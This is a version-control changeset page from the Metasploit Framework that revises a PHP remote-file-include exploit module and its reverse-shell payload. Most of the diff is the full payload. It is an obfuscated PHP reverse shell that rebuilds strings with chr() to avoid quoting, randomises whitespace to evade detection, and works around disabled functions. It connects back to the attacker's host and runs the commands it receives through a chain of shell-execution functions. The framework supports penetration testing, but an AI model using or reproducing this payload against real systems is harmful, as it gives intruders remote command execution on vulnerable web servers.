Navigation

← Previous Changeset
Next Changeset →

Changeset 5429

Timestamp:

03/04/08 01:34:26 (5 months ago)

Author:

egypt

Message:

More reliable reverse shell

Files:

framework3/trunk/lib/msf/core/exploit/http.rb (modified) (1 diff)
framework3/trunk/modules/exploits/unix/webapp/php_include.rb (modified) (4 diffs)
framework3/trunk/modules/payloads/singles/php/reverse_php.rb (modified) (3 diffs)

Legend:

: Unmodified
: Added
: Removed
: Modified
: Copied
: Moved

framework3/trunk/lib/msf/core/exploit/http.rb

r5113	r5429
674	674	addr = Rex::Socket.source_address( sock ? sock.peerhost : '1.2.3.4')
675	675	end
676		"http://#{addr}:#{datastore['SRVPORT']}#{get_resource()}"
	676	"http://#{addr}:#{datastore['SRVPORT']}#{get_resource()}?"
677	677	end
678	678

framework3/trunk/modules/exploits/unix/webapp/php_include.rb

r4419	r5429
1	1	##
2		# $Id:$
	2	# $Id$
3	3	##
4	4
…	…
18	18
19	19	include Exploit::Remote::Tcp
	20	include Exploit::Remote::HttpClient
20	21	include Exploit::Remote::HttpServer::PHPInclude
21	22
…	…
24	25	'Name' => 'PHP Include Generic Exploit',
25	26	'Description' => %q{
	27	Exploits things like <?php include($_GET['path']); ?>
26	28	},
27		'Author' => [ 'hdm' ],
	29	'Author' => [ 'hdm' , 'egypt <egypt@nmt.edu>'],
28	30	'License' => MSF_LICENSE,
29	31	'Version' => '$Revision$',
…	…
48	50	], self.class)
49	51	end
	52
50	53
51
52	54	def php_exploit
53		connect
54		req = "GET #{datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))} HTTP/1.0\r\n\r\n"
55		print_status("Sending: #{req}")
56		sock.put(req)
57		disconnect
	55	# very short timeout because the request may never return if we're
	56	# sending a socket payload
	57	timeout = 0.01
	58	uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))
	59	print_status("Trying uri #{uri}")
	60	response = send_request_raw({ 'uri' => uri },timeout)
	61
58	62	end
59
	63
60	64	end
61	65	end

framework3/trunk/modules/payloads/singles/php/reverse_php.rb

r4419	r5429
1	1	##
2		# $Id:$
	2	# $Id$
3	3	##
4	4
…	…
28	28	'Name' => 'PHP Command Shell, Reverse TCP (via php)',
29	29	'Version' => '$Revision$',
30		'Description' => 'Reverse PHP connect back shell',
31		'Author' => ~~['diaul <diaul@devilopers.org>',]~~,
	30	'Description' => 'Reverse PHP connect back shell with checks for disabled functions',
	31	'Author' => 'egypt <egypt@nmt.edu>',
32	32	'License' => BSD_LICENSE,
33	33	'Platform' => 'php',
…	…
44	44	end
45	45
46
47
48
49	46	#
50		# PHP Reverse Shell
	47	# PHP Reverse Shell completely without quotes. Strings and regexes
	48	# are replaced with chr() equivalents and the IP address to connect to is
	49	# replaced with integer equivalent wrapped in long2ip().
	50	#
	51	# Attempts to make a connection back to the attacker using fsockopen or
	52	# socket_create and associated functions. Then attempts to execute a
	53	# system command with the following functions, in order:
	54	# - shell_exec
	55	# - passthru
	56	# - system
	57	# - exec
	58	# - proc_open
	59	# - popen
	60	#
	61	# Issues
	62	# - Since each command is executed in a new shell, 'cd' does nothing.
	63	# Perhaps it should be special-cased to call chdir()
	64	# - Tries to get around disable_functions but makes no attempts to
	65	# circumvent safe mode.
	66	# - Should this add '2>&1' to the end of the executed command to avoid
	67	# logging suspicious error messages?
51	68	#
52	69	def php_reverse_shell
53	70
54		#
55		# inet_aton to bypass magic quotes protection for eval() vulnerarilities
56		#
	71	ipaddr = datastore['LHOST'].split(/\./).map{\|c\| c.to_i}.pack("C*").unpack("N").first
	72	port = datastore['LPORT']
57	73
58		if datastore['LHOST']
59		ipaddr = datastore['LHOST'].split(/\./).map{\|c\| c.to_i}.pack("C*").unpack("N").first
60		end
	74	#
	75	# The regex looks like this unobfuscated:
	76	# preg_replace('/[, ]+/', ',', $disabled);
	77	#
	78	shell=<<-END_OF_PHP_CODE
	79	$ipaddr=long2ip(#{ipaddr});
	80	$port=#{port};
	81	$_=chr(95);$a=chr(97);$b=chr(98);$c=chr(99);$d=chr(100);$e=chr(101);
	82	$f=chr(102);$h=chr(104);$i=chr(105);$l=chr(108);$m=chr(109);$n=chr(110);
	83	$o=chr(111);$p=chr(112);$r=chr(114);$s=chr(115);$t=chr(116);$u=chr(117);
	84	$x=chr(120);$y=chr(121);
	85	$disabled=@ini_get($d.$i.$s.$a.$b.$l.$e.$_.$f.$u.$n.$c.$t.$i.$o.$n.$s);
	86	if(!empty($disabled)){
	87	$disabled=preg_replace(chr(47).chr(91).chr(44).chr(32).chr(93).chr(43).chr(47),chr(44),$disabled);
	88	$disabled=explode(chr(44),$disabled);
	89	$disabled=array_map($t.$r.$i.$m,$disabled);
	90	}else{
	91	$disabled=array();
	92	}
	93	@set_time_limit(0);
	94	@ini_set($m.$a.$x.$_.$e.$x.$e.$c.$u.$t.$i.$o.$n.$_.$t.$i.$m.$e,0);
	95	function myexec($cmd){
	96	global$disabled,$_,$a,$c,$e,$h,$m,$n,$o,$p,$r,$s,$t,$u,$x,$y;
	97	if(is_callable($s.$h.$e.$l.$l.$_.$e.$x.$e.$c)and!in_array($s.$h.$e.$l.$l.$_.$e.$x.$e.$c,$disabled)){
	98	$output=shell_exec($cmd);
	99	return$output;
	100	}elseif(is_callable($p.$a.$s.$s.$t.$h.$r.$u)and!in_array($p.$a.$s.$s.$t.$h.$r.$u,$disabled)){
	101	ob_start();
	102	passthru($cmd);
	103	$output=ob_get_contents();
	104	ob_end_clean();
	105	return$output;
	106	}elseif(is_callable($s.$y.$s.$t.$e.$m)and!in_array($s.$y.$s.$t.$e.$m,$disabled)){
	107	ob_start();
	108	system($cmd);
	109	$output=ob_get_contents();
	110	ob_end_clean();
	111	return$output;
	112	}elseif(is_callable($e.$x.$e.$c)and!in_array($e.$x.$e.$c,$disabled)){
	113	$output=array();
	114	exec($cmd,$output);
	115	$output=join(chr(10),$output).chr(10);
	116	return$output;
	117	}elseif(is_callable($p.$r.$o.$c.$_.$o.$p.$e.$n)and!in_array($p.$r.$o.$c.$_.$o.$p.$e.$n,$disabled)){
	118	$handle=proc_open($cmd,array(array(pipe,r),array(pipe,w),array(pipe,w)),$pipes);
	119	$output=NULL;
	120	while(!feof($pipes[1])){
	121	$output.=fread($pipes[1],1024);
	122	}
	123	@proc_close($handle);
	124	return$output;
	125	}elseif(is_callable($p.$o.$p.$e.$n)and!in_array($p.$o.$p.$e.$n,$disabled)){
	126	$fp=popen($cmd,r);
	127	$output=NULL;
	128	if(is_resource($fp)){
	129	while(!feof($fp)){
	130	$output.=fread($fp,1024);
	131	}
	132	}
	133	@pclose($fp);
	134	return$output;
	135	}else{
	136	return false;
	137	}
	138	}
	139	$command=NULL;
	140	$nofuncs=$n.$o.chr(32).$e.$x.$e.$c.chr(32).$f.$u.$n.$c.$t.$i.$o.$n.$s.chr(32).chr(61).chr(40);
	141	if(is_callable(@f.@s.@o.@c.@k.@o.@p.@e.@n)and!in_array(@f.@s.@o.@c.@k.@o.@p.@e.@n,$disabled)){
	142	$sock=fsockopen($ipaddr,$port);
	143	while($cmd=fread($sock,2048)){
	144	$output=myexec(substr($cmd,0,-1));
	145	if($output===false){
	146	fwrite($sock,$nofuncs);
	147	break;
	148	}
	149	fwrite($sock,$output);
	150	}
	151	fclose($sock);
	152	}else{
	153	$sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
	154	socket_connect($sock,$ipaddr,$port);
	155	while($cmd=socket_read($sock,2048)){
	156	$output=myexec(substr($cmd,0,-1));
	157	if($output===false){
	158	socket_write($sock,$nofuncs);
	159	break;
	160	}
	161	socket_write($sock,$output,strlen($output));
	162	}
	163	socket_close($sock);
	164	}
	165	END_OF_PHP_CODE
61	166
62		shell = <<-END_OF_PHP_CODE
63		error_reporting(E_ALL);
64		$service_port = #{datastore['LPORT']};
65
66		$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
67		$result = socket_connect($socket, #{ipaddr}, $service_port);
68
69		$command = NULL;
70
71		while ($command = socket_read($socket, 2048)) {
72		$output = shell_exec(substr($command, 0, -1));
73		socket_write($socket, $output, strlen($output));
	167	shell.gsub!(/[\t\n]+/, "\t")
	168	# spaces are important but there's no need for tabs and newlines, so
	169	# randomize them bit
	170	shell.gsub!("\t") { \|s\|
	171	len = rand(5)+2
	172	set = "\x09\x20\x0d\x0a"
	173	buf = ''
	174
	175	while (buf.length < len)
	176	buf << set[rand(set.length)].chr
	177	end
	178
	179	buf
74	180	}
75	181
76		~~socket_close($socket);~~
77		~~END_OF_PHP_CODE~~
78
79	182	return shell
80
81	183	end
82
83	184
84	185	#

Navigation

Changeset 5429

Legend:

framework3/trunk/lib/msf/core/exploit/http.rb

framework3/trunk/modules/exploits/unix/webapp/php_include.rb

framework3/trunk/modules/payloads/singles/php/reverse_php.rb

Download in other formats: